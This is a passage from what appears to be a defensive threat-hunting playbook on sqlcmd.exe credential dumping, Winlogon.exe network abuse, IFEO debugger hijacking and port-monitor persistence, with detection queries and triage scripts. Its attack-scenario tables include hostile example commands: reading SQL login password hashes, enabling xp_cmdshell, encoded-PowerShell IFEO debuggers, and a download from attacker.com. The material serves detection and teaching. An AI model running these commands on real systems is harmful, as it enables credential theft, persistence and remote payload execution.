launchctl unload ~/Library/LaunchAgents/malicious.plist
📌 4. Revoke Sudo Permissions for Compromised Accounts
usermod -L compromised_user
📌 5. Perform Full Antivirus Scan
clamscan -r / --bell -i
🛡️ 5. Prevention Steps
Enable SELinux (Linux): Enforce security contexts.
Enable SIP (macOS): Protect system directories.
Limit Sudo Access: Use least privilege principles.
Monitor Logs: Regularly review auth logs.
Disable Unused Services: Stop unnecessary daemons and agents.
🧠 6. Key Takeaways
Privilege Escalation is Critical: Early detection is key.
Focus on Key Logs: /var/log/auth.log, /var/log/secure, system.log.
SIEM Queries: Use KQL, Splunk, or FQL for real-time monitoring.
Enable Integrity Checks: Ensure permissions on sensitive files are secure.
🚨 Credential Dumping Using sqlcmd.exe
🔍 1. Attack Breakdown
📝 What is sqlcmd.exe?
sqlcmd.exe is a command-line utility provided by Microsoft SQL Server. It allows users to connect to SQL Server databases, execute T-SQL commands, and query data.
📑 Why Do Attackers Abuse sqlcmd.exe?
Trusted Binary: Signed by Microsoft and often allowed by security controls.
Credential Access: Extract stored database credentials.
Lateral Movement: Use database credentials to pivot across systems.
Data Exfiltration: Export sensitive data.
Persistence: Store payloads in SQL Server jobs or procedures.
📌 Common Attack Scenarios
Technique | Description | Example Command
Extract Database Credentials | Access SQL Server credentials from memory. | sqlcmd -Q "SELECT * FROM sys.sql_logins"
Retrieve Hashes from SQL Tables | Dump hashed credentials. | sqlcmd -Q "SELECT name, password_hash FROM sys.sql_logins"
Run Malicious Queries | Execute malicious SQL commands. | sqlcmd -Q "EXEC xp_cmdshell 'whoami'"
Enable xp_cmdshell for System Access | Enable external command execution. | sqlcmd -Q "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
Persist via SQL Agent Jobs | Create malicious SQL Server jobs. | sqlcmd -Q "EXEC msdb.dbo.sp_add_job @job_name='MaliciousJob', @enabled=1;"
🛡️ 2. Detection Techniques
📊 Manual Inspection with SQLCMD
🕵️ Check Active SQLCMD Sessions
SELECT * FROM sys.dm_exec_sessions WHERE program_name LIKE '%SQLCMD%';
🕵️ Identify Suspicious Commands Executed via SQLCMD
SELECT r.session_id, t.text AS sql_text
FROM sys.dm_exec_requests AS r
CROSS APPLY sys.dm_exec_sql_text(r.sql_handle) AS t
WHERE r.session_id > 50;
🕵️ Monitor SQL Server Agent Jobs
SELECT * FROM msdb.dbo.sysjobs;
🕵️ Look for xp_cmdshell Execution
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
🕵️ Check for Suspicious Logins
SELECT name, create_date, is_disabled FROM sys.sql_logins;
📊 Manual Inspection with PowerShell
🕵️ Identify Suspicious SQLCMD Processes
Get-Process -Name sqlcmd | Select-Object Id, ProcessName, Path, StartTime
🕵️ Inspect SQLCMD Command-Line History
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*sqlcmd*" }
🕵️ Check SQLCMD Network Connections
Get-NetTCPConnection -OwningProcess (Get-Process -Name sqlcmd).Id
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect SQLCMD Process Execution
DeviceProcessEvents
| where FileName == "sqlcmd.exe"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
🕵️ Identify SQLCMD with Suspicious Command-Line Arguments
DeviceProcessEvents
| where FileName == "sqlcmd.exe"
| where ProcessCommandLine contains "xp_cmdshell" or ProcessCommandLine contains "password_hash"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
🕵️ Trace SQLCMD Network Activity
DeviceNetworkEvents
| where InitiatingProcessFileName == "sqlcmd.exe"
| project Timestamp, DeviceName, RemoteIP, RemotePort, ProcessCommandLine, AccountName
🕵️ Monitor SQLCMD Accessing Sensitive Tables
DeviceProcessEvents
| where FileName == "sqlcmd.exe"
| where ProcessCommandLine contains "sql_logins" or ProcessCommandLine contains "syslogins"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
🕵️ Detect SQLCMD Persistence Mechanisms
DeviceProcessEvents
| where FileName == "sqlcmd.exe"
| where ProcessCommandLine contains "sp_add_job"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
📊 Event Viewer Logs
Event ID | Description
4688 | New process created (sqlcmd.exe).
4624 | Account logon (look for database access).
4768 | Kerberos Authentication Ticket requested.
4104 | PowerShell script block logging.
5156 | Network connection allowed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: sqlcmd -Q "SELECT * FROM sys.sql_logins"
📌 Focus on Event ID 4624:
Look for suspicious logins via SQLCMD.
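As an added example (not part of the original playbook), this Python script triages sqlcmd.exe command lines taken from 4688 or Sysmon process-creation events. It tokenises the Windows command line (double-quoted runs become one argument), pulls out the -Q/-q query, the -i input file and the connection options, normalises the T-SQL so that sys.[sql_logins] and sys.sql_logins match alike, and rates the query against the scenarios in the table above (xp_cmdshell use and enablement, sys.sql_logins / password_hash reads, sp_add_job persistence). Two things the KQL above does not surface are also reported: a -i script whose content is not on the command line at all, and a -P password that is now sitting in the event log. The command lines, server name, password and file path are constructed sample data; the rule set is my own.

```python
import re

# Constructed 4688-style command lines for sqlcmd.exe (hypothetical; server name, password
# and file path are made up).
SAMPLE_COMMAND_LINES = [
    'sqlcmd -S db01 -E -Q "SELECT @@VERSION"',
    'sqlcmd -S db01 -U sa -P Passw0rd! -Q "EXEC sp_configure \'show advanced options\', 1; '
    'RECONFIGURE; EXEC sp_configure \'xp_cmdshell\', 1; RECONFIGURE;"',
    'sqlcmd -S db01 -E -Q "SELECT name, [password_hash] FROM sys.[sql_logins]"',
    r'sqlcmd -S db01 -E -i C:\Users\Public\job.sql',
    'sqlcmd -S db01 -E -Q "EXEC msdb.dbo.sp_add_job @job_name=\'Nightly\', @enabled=1;"',
]

# (category, pattern, severity) in priority order; the patterns mirror the page's scenarios.
RULES = [
    ("enable_xp_cmdshell", re.compile(r"sp_configure\s*['\"]?xp_cmdshell", re.IGNORECASE), "high"),
    ("os_command_execution", re.compile(r"\bxp_cmdshell\b", re.IGNORECASE), "high"),
    ("credential_access", re.compile(r"password_hash|sys\.sql_logins|\bsyslogins\b", re.IGNORECASE), "high"),
    ("persistence", re.compile(r"\bsp_add_job(?:step|schedule)?\b", re.IGNORECASE), "medium"),
]
RANK = {"none": 0, "low": 1, "medium": 2, "high": 3}


def split_args(cmdline):
    """Tokenise a Windows command line: a double-quoted run is one argument (quotes stripped).
    sqlcmd options are case-sensitive, so -Q/-q, -i, -S, -U and -P are matched as written."""
    return [t[1:-1] if len(t) >= 2 and t.startswith('"') and t.endswith('"') else t
            for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def normalise_sql(sql):
    """Strip [brackets] and collapse whitespace so sys.[sql_logins] matches like sys.sql_logins."""
    return re.sub(r"\s+", " ", sql.replace("[", "").replace("]", "")).strip()


def triage_sqlcmd(cmdline):
    """Return the parsed options, matched categories and an overall severity for one command line."""
    args = split_args(cmdline)
    opts = {}
    for i, a in enumerate(args[:-1]):
        if a in ("-Q", "-q", "-i", "-S", "-U", "-P"):
            opts[a] = args[i + 1]
    query = opts.get("-Q", opts.get("-q"))
    result = {"server": opts.get("-S"), "login": opts.get("-U"),
              "cleartext_password": "-P" in opts, "input_file": opts.get("-i"),
              "query": query, "categories": [], "severity": "none"}
    sev = "none"
    if query is not None:
        sql = normalise_sql(query)
        for cat, rx, rule_sev in RULES:
            if rx.search(sql):
                result["categories"].append(cat)
                sev = max(sev, rule_sev, key=RANK.get)
    elif opts.get("-i"):
        # The script body never appears in 4688: fetch and review the file before closing the alert.
        sev = max(sev, "medium", key=RANK.get)
    if result["cleartext_password"]:
        # A SQL login password in the process-creation log is an exposure in its own right.
        sev = max(sev, "medium", key=RANK.get)
    result["severity"] = sev
    return result


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = triage_sqlcmd(line)
        print(f"{r['severity']:6} {r['categories']} login={r['login']} "
              f"pw_on_cmdline={r['cleartext_password']} file={r['input_file']}")
```

Run it over the ProcessCommandLine column of the KQL results above; the "none" verdicts are the baseline of routine sqlcmd use, and anything rated high should be cross-checked against the SQL Server side with the sys.dm_exec_sessions and sys.configurations queries earlier in this section.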
🕵️ 3. Investigation Techniques
1️⃣ Review SQL Server Error Logs
EXEC xp_readerrorlog;
2️⃣ Trace SQLCMD Commands from System Logs
Review authentication attempts:
SELECT * FROM sys.dm_exec_connections;
3️⃣ Inspect SQLCMD Parent-Child Processes
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <SQLCMD_PID> }
🔧 4. Remediation Steps
📌 1. Disable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
📌 2. Revoke Unnecessary Database Permissions
REVOKE CONNECT FROM [malicious_user];
📌 3. Terminate Malicious SQLCMD Processes
Stop-Process -Name sqlcmd -Force
📌 4. Remove Malicious SQL Jobs
EXEC msdb.dbo.sp_delete_job @job_name='MaliciousJob';
📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Restrict xp_cmdshell: Disable unless absolutely necessary.
Implement Role-Based Access Control (RBAC): Minimize privileged accounts.
Enable SQL Server Audit Logs: Track administrative activities.
Network Segmentation: Limit SQL Server access.
Monitor SQLCMD Processes: Create alerts for unusual commands.
🧠 6. Key Takeaways
Focus on Event IDs: 4688, 4624, 4768.
Monitor SQLCMD Commands: Look for xp_cmdshell and sensitive queries.
Limit Privileges: Ensure sqlcmd cannot execute arbitrary system commands.
🚨 Suspicious Connection by Winlogon.exe
🔍 1. Attack Breakdown
📝 What is Winlogon.exe?
Winlogon.exe is a core Windows process responsible for handling user login, desktop initialization, and user session management. It is located in:
C:\Windows\System32\winlogon.exe
It should never establish outbound network connections under normal circumstances.
📑 Why Do Attackers Abuse Winlogon.exe?
Trusted Binary: Signed by Microsoft and rarely monitored.
Stealth: Blends in with legitimate processes.
Evasion: Evades traditional antivirus and security tools.
Persistence: Can be abused for long-term persistence.
Data Exfiltration: Used to hide outbound communication.
📌 Common Attack Scenarios
Technique | Description | Example Indicator
Code Injection into Winlogon | Malicious code injected into Winlogon. | rundll32.exe inject.dll
Winlogon Network Communication | Unauthorized outbound connections from Winlogon. | winlogon.exe connects to 192.168.1.100
Persistence via Registry | Backdoors set in Winlogon registry keys. | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Credential Theft | Exfiltration of cached credentials. | winlogon.exe dumps LSASS process
Proxy for Malware C2 Traffic | Winlogon used to proxy C2 connections. | winlogon.exe connects to malicious.com
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Verify Winlogon Process Path
Get-Process -Name winlogon | Select-Object Id, Path
✅ Expected Path: C:\Windows\System32\winlogon.exe
❌ Suspicious Path: C:\Users\Public\winlogon.exe, C:\Temp\winlogon.exe
🕵️ Check Network Connections by Winlogon
Get-Process -Name winlogon | ForEach-Object {
Get-NetTCPConnection -OwningProcess $_.Id
}
Look for Outbound Connections to:
Unfamiliar IPs.
Non-standard ports (e.g., 4444, 8080).
🕵️ Inspect Parent-Child Relationship
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "winlogon.exe" } | Select-Object ProcessId, ParentProcessId, CommandLine
✅ Expected Parent Process: services.exe
❌ Unexpected Parent Process: cmd.exe, powershell.exe
🕵️ Inspect Winlogon Registry Keys
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Focus on:
Userinit (should point to userinit.exe)
Shell (should point to explorer.exe)
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Winlogon Outbound Network Connections
DeviceNetworkEvents
| where InitiatingProcessFileName == "winlogon.exe"
| where RemoteIP != "127.0.0.1" and RemoteIP != "::1"
| project Timestamp, DeviceName, RemoteIP, RemotePort, ProcessCommandLine, AccountName
🕵️ Monitor Suspicious Winlogon Registry Changes
DeviceRegistryEvents
| where RegistryKey contains "Winlogon"
| where RegistryValueName in ("Userinit", "Shell")
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName
🕵️ Trace Process Tree Involving Winlogon
DeviceProcessEvents
| where FileName == "winlogon.exe"
| where ParentProcessName != "services.exe"
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountName
🕵️ Identify Code Injection into Winlogon
DeviceProcessEvents
| where FileName == "winlogon.exe"
| where ProcessCommandLine contains "CreateRemoteThread"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
📊 Event Viewer Logs
Event ID | Description
4688 | A new process was created (winlogon.exe).
5156 | Network connection allowed.
4663 | Registry key access detected.
7045 | A new service was installed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: winlogon.exe -c "powershell.exe -EncodedCommand"
ParentProcessName: cmd.exe
📌 Focus on Event ID 4663:
Registry key modification:
RegistryKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
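As an added example (not part of the original playbooks), this Python script covers the baseline checks of both the ie4uinit.exe section and this Winlogon section in one place: it compares each baselined binary's image path with its legitimate install locations (the two ie4uinit.exe paths and the single winlogon.exe path given above), applies the rule that winlogon.exe makes no outbound connections, and validates the Userinit and Shell values the way the "Focus on" note describes, including the trailing-comma form of the default Userinit value that an appended second executable exploits. The process rows, connection rows and registry values are constructed sample data shaped like Get-Process, Get-NetTCPConnection and Get-ItemProperty output; the baseline dictionaries are taken from this page and are meant to be extended.

```python
import ipaddress
import ntpath

# Baselines taken from the two playbooks: legitimate install paths for each binary, the rule
# that winlogon.exe never makes outbound connections, and the expected Userinit/Shell values.
EXPECTED_PATHS = {
    "ie4uinit.exe": {r"c:\windows\system32\ie4uinit.exe", r"c:\windows\syswow64\ie4uinit.exe"},
    "winlogon.exe": {r"c:\windows\system32\winlogon.exe"},
}
NO_OUTBOUND = {"winlogon.exe"}
WINLOGON_EXPECTED = {"Userinit": "userinit.exe", "Shell": "explorer.exe"}

# Constructed sample data (hypothetical): Get-Process-style rows, Get-NetTCPConnection-style
# rows for one winlogon PID, and the Winlogon key's values as Get-ItemProperty returns them.
SAMPLE_PROCESSES = [
    {"Id": 812,  "Path": r"C:\Windows\System32\winlogon.exe"},
    {"Id": 3012, "Path": r"C:\Users\Public\winlogon.exe"},
    {"Id": 2204, "Path": r"C:\Windows\SysWOW64\ie4uinit.exe"},
    {"Id": 4520, "Path": r"C:\Temp\ie4uinit.exe"},
    {"Id": 5100, "Path": r"C:\Windows\System32\svchost.exe"},   # not baselined here: ignored
]
SAMPLE_CONNECTIONS = [
    {"RemoteAddress": "0.0.0.0", "RemotePort": 0, "State": "Listen"},
    {"RemoteAddress": "127.0.0.1", "RemotePort": 49700, "State": "Established"},
    {"RemoteAddress": "198.51.100.7", "RemotePort": 4444, "State": "Established"},
]
SAMPLE_WINLOGON_VALUES = {
    "Userinit": r"C:\Windows\system32\userinit.exe,C:\Users\Public\svc.exe,",
    "Shell": "explorer.exe",
}


def norm_path(p):
    return p.replace("/", "\\").lower()


def check_processes(processes):
    """Flag baselined binaries running from anywhere but their known install paths.
    The name is taken from the image path, so a correctly named copy in C:\\Temp is caught."""
    findings = []
    for p in processes:
        path = norm_path(p["Path"])
        expected = EXPECTED_PATHS.get(ntpath.basename(path))
        if expected is not None and path not in expected:
            findings.append({"pid": p["Id"], "path": p["Path"], "reason": "unexpected_path"})
    return findings


def flag_outbound(process_name, connections):
    """Remote endpoints a no-network process has actually connected to. Listening sockets,
    loopback (all of 127/8 and ::1) and unspecified addresses are excluded, which is broader
    than the literal RemoteIP != "127.0.0.1" test in the KQL above."""
    if process_name.lower() not in NO_OUTBOUND:
        return []
    hits = []
    for c in connections:
        if c.get("State", "").lower() == "listen":
            continue
        try:
            ip = ipaddress.ip_address(c["RemoteAddress"])
        except ValueError:
            continue
        if ip.is_loopback or ip.is_unspecified:
            continue
        host = f"[{ip}]" if ip.version == 6 else str(ip)
        hits.append(f"{host}:{c['RemotePort']}")
    return hits


def check_winlogon_values(values):
    """Every non-empty, comma-separated entry of Userinit/Shell must be the expected binary;
    anything else is returned as (value name, offending entry)."""
    bad = []
    for name, expected_exe in WINLOGON_EXPECTED.items():
        for entry in values.get(name, "").split(","):
            entry = entry.strip().strip('"')
            if not entry:           # Windows' own Userinit value ends with a trailing comma
                continue
            if ntpath.basename(norm_path(entry)) != expected_exe:
                bad.append((name, entry))
    return bad


if __name__ == "__main__":
    print(check_processes(SAMPLE_PROCESSES))
    print(flag_outbound("winlogon.exe", SAMPLE_CONNECTIONS))
    print(check_winlogon_values(SAMPLE_WINLOGON_VALUES))
```

Export the live data with Get-Process | Select-Object Id, Path, Get-NetTCPConnection -OwningProcess <PID> and Get-ItemProperty on the Winlogon key, and feed the rows in unchanged; the checks are pure functions, so they can also be run against values pulled from an EDR or a forensic registry hive.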
🕵️ 3. Investigation Techniques
1️⃣ Validate Winlogon Binary Integrity
Get-FileHash "C:\Windows\System32\winlogon.exe" -Algorithm SHA256
Compare hash on VirusTotal.
2️⃣ Inspect Winlogon Startup Configurations
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
3️⃣ Trace Winlogon’s Network Traffic
netstat -ano | findstr <Winlogon_PID>
🔧 4. Remediation Steps
📌 1. Terminate Suspicious Winlogon Processes
Stop-Process -Id <PID> -Force
📌 2. Restore Registry Keys
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "userinit.exe"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "explorer.exe"
📌 3. Remove Suspicious Executables
Remove-Item -Path "C:\Users\Public\winlogon.exe" -Force
📌 4. Block Malicious IPs
New-NetFirewallRule -DisplayName "Block Malicious IP" -Direction Outbound -RemoteAddress <IP> -Action Block
📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Enable Command Line Auditing: Track Winlogon execution.
Monitor Registry Changes: Enable alerts for Winlogon keys.
Restrict Registry Permissions: Prevent unauthorized modifications.
Review Firewall Rules: Block unnecessary outbound connections.
Enable Behavioral Analytics: Use EDR to monitor anomalies.
🧠 6. Key Takeaways
Winlogon.exe Should Not Make Network Connections: Flag outbound traffic.
Monitor Registry Keys: Validate Userinit and Shell.
Focus on Event IDs: 4688, 4663, 5156.
Investigate Parent-Child Process Trees: Ensure legitimate parent processes.
🚨 Image File Execution Options (IFEO) Injection: Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What is IFEO (Image File Execution Options)?
Image File Execution Options (IFEO) is a Windows Registry key designed for debugging applications.
Attackers exploit IFEO to:
Hijack legitimate applications.
Establish persistence by injecting malicious binaries.
Redirect application execution to malicious payloads.
📑 Why Do Attackers Use IFEO Injection?
Persistence: Payloads execute every time the targeted application runs.
Stealth: Abuses legitimate debugging mechanisms.
Execution Control: Replace or redirect legitimate processes.
Low Detection Rate: Often ignored by traditional antivirus tools.
📌 Common Attack Scenarios
Technique | Registry Key | Example Payload
Debugger Hijacking | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe | Debugger = C:\Malicious\payload.exe
Application Redirection | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe | Debugger = powershell.exe -ExecutionPolicy Bypass -EncodedCommand <payload>
Persistence Mechanism | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe | Debugger = cmd.exe /c start malicious.exe
DLL Hijacking | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe | Debugger = rundll32.exe C:\malicious.dll
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List IFEO Registry Keys
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" |
Select-Object Name
🕵️ Search for Debugger Entries
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" -Recurse |
Get-ItemProperty | Where-Object { $_.Debugger } |
Select-Object PSChildName, Debugger
🕵️ Inspect User-Level IFEO Keys
Get-ChildItem -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" -Recurse |
Get-ItemProperty | Where-Object { $_.Debugger } |
Select-Object PSChildName, Debugger
🕵️ Check for Suspicious Debugger Paths
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" -Recurse |
Get-ItemProperty | Where-Object { $_.Debugger -match "cmd.exe|powershell.exe|rundll32.exe" } |
Select-Object PSChildName, Debugger
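The one-liners above list Debugger values; the script below is an added example (not the playbook's own code) that triages them: it walks the HKLM and HKCU IFEO keys plus the WOW6432Node view, resolves the executable each Debugger value would launch, and flags command or script interpreters, binaries in user-writable paths, per-user entries and unsigned or missing files. The interpreter and path patterns are assumptions to tune for your environment.

```powershell
# Added example (not part of the original playbook): triage every IFEO "Debugger"
# value and classify the executable it launches. Run from an elevated shell.
$IfeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)
# Assumption: a legitimate debugger setting never points at one of these interpreters.
$InterpreterPattern  = '^(cmd|powershell|pwsh|rundll32|mshta|wscript|cscript|regsvr32)\.exe$'
# Assumption: directories a standard user can write to.
$UntrustedPathPattern = '\\(Temp|Public|AppData|Downloads|ProgramData)\\'

function Get-DebuggerExecutable {
    # First token of a Debugger command line, honouring quotes:
    # '"C:\Program Files\dbg\x.exe" -p' -> C:\Program Files\dbg\x.exe
    param([string]$CommandLine)
    $cl = $CommandLine.Trim()
    if ($cl.StartsWith('"')) {
        $end = $cl.IndexOf('"', 1)
        if ($end -gt 0) { return $cl.Substring(1, $end - 1) }
    }
    return ($cl -split '\s+', 2)[0]
}

function Get-IfeoDebuggerFindings {
    param([string[]]$Roots = $IfeoRoots)
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }
        # Each subkey is named after the image it applies to (notepad.exe, ...).
        Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
            $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
            if (-not $props.Debugger) { return }   # only keys carrying a Debugger value matter here
            $exe     = Get-DebuggerExecutable $props.Debugger
            $leaf    = [IO.Path]::GetFileName($exe)
            $reasons = @()
            if ($leaf -match $InterpreterPattern)  { $reasons += 'launches a command/script interpreter' }
            if ($exe -match $UntrustedPathPattern) { $reasons += 'executable sits in a user-writable path' }
            if ($root -like 'HKCU:*')              { $reasons += 'set in a per-user hive' }
            # Get-AuthenticodeSignature also honours catalog signatures, so stock
            # Windows binaries report Valid even without an embedded signature.
            $sig = if (Test-Path -LiteralPath $exe) { (Get-AuthenticodeSignature -LiteralPath $exe).Status } else { 'NotFound' }
            if ($sig -ne 'Valid') { $reasons += "signature status $sig" }
            [pscustomobject]@{
                TargetImage = $_.PSChildName
                Hive        = $root
                Debugger    = $props.Debugger
                Executable  = $exe
                Signature   = $sig
                Verdict     = if ($reasons) { 'SUSPICIOUS: ' + ($reasons -join '; ') } else { 'review' }
            }
        }
    }
}

Get-IfeoDebuggerFindings | Sort-Object Verdict -Descending | Format-Table -AutoSize -Wrap
```

Any Debugger value at all deserves a look, so entries with no flagged reason are still reported as "review" rather than silently dropped.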
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Suspicious IFEO Registry Modifications
DeviceRegistryEvents
| where RegistryKey contains "Image File Execution Options"
| where RegistryValueName == "Debugger"
| where RegistryValueData contains "cmd.exe" or RegistryValueData contains "powershell.exe" or RegistryValueData contains "rundll32.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, InitiatingProcessAccountName
🕵️ Trace IFEO Modifications by Processes
DeviceProcessEvents
| where ProcessCommandLine contains "reg add" and ProcessCommandLine contains "Image File Execution Options"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
🕵️ Monitor Application Execution via IFEO Hijacking
DeviceProcessEvents
| where FileName in ("notepad.exe", "explorer.exe", "svchost.exe", "winlogon.exe")
| where ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "powershell.exe"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName, AccountName
🕵️ Identify IFEO Persistence Mechanisms
DeviceRegistryEvents
| where RegistryKey contains "Image File Execution Options"
| where RegistryValueName == "Debugger"
| where RegistryValueData contains "malicious.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, InitiatingProcessAccountName
📊 Event Viewer Logs
Event ID | Description
4688 | New process created (cmd.exe, powershell.exe, rundll32.exe).
4663 | Registry key access detected.
4104 | PowerShell script block execution.
7045 | A new service was installed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: cmd.exe /c "malicious.exe"
ParentProcessName: explorer.exe
📌 Focus on Event ID 4663:
Registry access:
RegistryKey: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
🕵️ 3. Investigation Techniques
1️⃣ Validate IFEO Entries
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" -Recurse |
Get-ItemProperty | Where-Object { $_.Debugger }
2️⃣ Inspect Associated Binaries
Verify integrity of payloads:
Get-FileHash -Path "C:\Malicious\payload.exe"
3️⃣ Trace Parent-Child Process Trees
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }
🔧 4. Remediation Steps
📌 1. Remove Malicious IFEO Registry Entries
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" -Name "Debugger"
📌 2. Validate Application Paths
Ensure legitimate binaries are in the expected paths.
📌 3. Audit Registry Access
Enable Registry Auditing for IFEO keys.
📌 4. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Enable Command Line Auditing: Monitor reg add commands.
Restrict Registry Access: Limit access to IFEO registry keys.
Monitor Event Logs: Focus on 4688, 4663, 7045.
Implement EDR Policies: Block suspicious registry modifications.
Enable Behavior-Based Detection: Identify abnormal parent-child relationships.
🧠 6. Key Takeaways
Monitor IFEO Keys: Regularly audit Debugger values.
Event Focus: Look at 4688, 4663, and 7045.
Verify Parent-Child Processes: Look for unexpected process launches.
Enable Behavioral Analytics: Detect anomalies in registry access.
🚨 Port Monitors (Registry): Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What are Port Monitors?
Port Monitors are Windows components that handle print jobs sent to printers via defined ports.
They are configured in the Windows Registry and are often legitimate but can be abused by attackers for persistence and code execution.
📑 Why Do Attackers Abuse Port Monitors?
Persistence: Automatically execute malicious code on system startup.
Stealth: Blend in with legitimate printer operations.
Evasion: Often overlooked by antivirus and security tools.
Arbitrary Code Execution: Run payloads every time a print job is initiated.
📌 Common Registry Paths for Port Monitors
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3
📌 Common Attack Scenarios
Technique | Registry Key | Example Payload
Malicious DLL as Port Monitor | HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\MaliciousMonitor | C:\Windows\Temp\malicious.dll
Persistence via Print Spooler Service | HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\MonitorName\Driver | C:\Windows\Temp\payload.dll
Arbitrary DLL Execution | HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\AttackMonitor | powershell -c "Invoke-WebRequest http://attacker.com/payload.exe"
Hijacking Legitimate Monitors | HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Standard TCP/IP Port | C:\Windows\Temp\exploit.dll
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List All Registered Port Monitors
Get-ChildItem -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" | Select-Object Name
🕵️ Inspect Port Monitor DLL Paths
Get-ChildItem -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" -Recurse |
Get-ItemProperty | Select-Object PSChildName, Driver
🕵️ Identify Suspicious DLL Locations
Get-ChildItem -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" -Recurse |
Get-ItemProperty | Where-Object { $_.Driver -match "Temp|Public|AppData" } |
Select-Object PSChildName, Driver
🕵️ Check for Recent Modifications
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" |
Select-Object PSChildName, LastWriteTime
🕵️ Verify Loaded Monitor DLLs in Memory
Get-Process -Name spoolsv | Select-Object -ExpandProperty Modules |
Where-Object { $_.FileName -like "*.dll" }
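Putting the registry and in-memory checks above together, here is an added example (not the playbook's own code) that audits every registered port monitor: it resolves the DLL named in the Driver value, checks that it lives in System32 and carries a valid Microsoft signature, and records whether spoolsv.exe currently has it mapped. The "Microsoft" signer match is an assumption; adjust it if third-party monitors are expected.

```powershell
# Added example (not part of the original playbook): audit registered port monitors.
# Run from an elevated shell so spoolsv.exe's module list can be read.
$MonitorsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors'
$System32    = Join-Path $env:SystemRoot 'System32'

function Resolve-MonitorDll {
    # A bare file name such as "tcpmon.dll" is loaded from System32; a rooted
    # path (like the Temp examples in the table above) is taken as written.
    param([string]$Driver)
    if ([string]::IsNullOrWhiteSpace($Driver)) { return $null }
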